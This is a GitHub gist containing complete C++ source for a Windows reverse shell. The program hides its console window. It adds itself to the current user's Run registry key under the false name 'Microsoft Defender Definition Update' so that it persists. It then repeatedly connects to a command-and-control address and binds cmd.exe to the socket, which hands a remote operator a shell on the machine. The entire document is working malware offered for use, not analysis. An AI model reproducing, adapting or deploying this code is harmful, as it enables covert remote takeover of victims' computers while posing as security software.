Last active
October 7, 2021 11:04
-
-
Save Klepvink/d99c8c8a51866dc2c2ae2b3de361cbbf to your computer and use it in GitHub Desktop.
Reverse shell with persistence, written in C++. Credits: https://github.com/dev-frog/C-Reverse-Shell/blob/master/re.cpp
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <winsock2.h> | |
| #include <windows.h> | |
| #include <ws2tcpip.h> | |
| #include <iostream> | |
| #include <stdio.h> | |
| using namespace std; | |
| #pragma comment(lib, "Ws2_32.lib") | |
| #define DEFAULT_BUFLEN 1024 | |
| void RunShell(char *C2Server, int C2Port) | |
| { | |
| while (true) | |
| { | |
| Sleep(5000); | |
| SOCKET mySocket; | |
| sockaddr_in addr; | |
| WSADATA version; | |
| WSAStartup(MAKEWORD(2, 2), &version); | |
| mySocket = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL); | |
| addr.sin_family = AF_INET; | |
| addr.sin_addr.s_addr = inet_addr(C2Server); | |
| addr.sin_port = htons(C2Port); | |
| if (WSAConnect(mySocket, (SOCKADDR *)&addr, sizeof(addr), NULL, NULL, NULL, NULL) == SOCKET_ERROR) | |
| { | |
| closesocket(mySocket); | |
| WSACleanup(); | |
| continue; | |
| } | |
| else | |
| { | |
| char RecvData[DEFAULT_BUFLEN]; | |
| memset(RecvData, 0, sizeof(RecvData)); | |
| int RecvCode = recv(mySocket, RecvData, DEFAULT_BUFLEN, 0); | |
| if (RecvCode <= 0) | |
| { | |
| closesocket(mySocket); | |
| WSACleanup(); | |
| continue; | |
| } | |
| else | |
| { | |
| char Process[] = "cmd.exe"; | |
| STARTUPINFO sinfo; | |
| PROCESS_INFORMATION pinfo; | |
| memset(&sinfo, 0, sizeof(sinfo)); | |
| sinfo.cb = sizeof(sinfo); | |
| sinfo.dwFlags = (STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW); | |
| sinfo.hStdInput = sinfo.hStdOutput = sinfo.hStdError = (HANDLE)mySocket; | |
| CreateProcess(NULL, Process, NULL, NULL, TRUE, 0, NULL, NULL, &sinfo, &pinfo); | |
| WaitForSingleObject(pinfo.hProcess, INFINITE); | |
| CloseHandle(pinfo.hProcess); | |
| CloseHandle(pinfo.hThread); | |
| memset(RecvData, 0, sizeof(RecvData)); | |
| int RecvCode = recv(mySocket, RecvData, DEFAULT_BUFLEN, 0); | |
| if (RecvCode <= 0) | |
| { | |
| closesocket(mySocket); | |
| WSACleanup(); | |
| continue; | |
| } | |
| if (strcmp(RecvData, "exit\n") == 0) | |
| { | |
| exit(0); | |
| } | |
| } | |
| } | |
| } | |
| } | |
| int main(int argc, char **argv) | |
| { | |
| FreeConsole(); | |
| char basePath[255] = ""; | |
| string progPath = _fullpath(basePath, argv[0], sizeof(basePath)); | |
| HKEY hkey = NULL; | |
| LONG createStatus = RegCreateKey(HKEY_CURRENT_USER, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", &hkey); | |
| LONG status = RegSetValueEx(hkey, "Microsoft Defender Definition Update", 0, REG_SZ, (BYTE *)progPath.c_str(), (progPath.size() + 1) * sizeof(wchar_t)); | |
| if (argc == 3) | |
| { | |
| int port = atoi(argv[2]); | |
| RunShell(argv[1], port); | |
| } | |
| else | |
| { | |
| char host[] = "127.0.0.1"; | |
| int port = 4446; | |
| RunShell(host, port); | |
| } | |
| return 0; | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment